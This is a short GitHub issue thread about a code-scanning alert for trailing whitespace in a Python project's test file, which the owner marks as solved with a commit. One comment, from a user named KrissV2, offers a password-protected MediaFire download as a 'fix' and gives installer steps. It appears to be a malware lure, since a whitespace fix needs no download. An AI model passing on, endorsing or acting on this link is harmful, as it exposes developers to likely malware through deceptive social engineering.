### ISSUE TITLE
Fix code scanning alert - Trailing whitespace

### ISSUE THREAD

**Issue by MarkusHackspacher** [MarkusHackspacher/pycupbetting#5]
Tracking issue for:
- [ ] https://github.com/MarkusHackspacher/pycupbetting/security/code-scanning/218

https://github.com/MarkusHackspacher/pycupbetting/blob/a1165b6d5eaffcad3fdd15bad84f5c8148890e78/tests/test_model.py#L122

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by MarkusHackspacher** [comment]
Solved in
d56adb318de82ba7989600fed23a8f738a23cf53
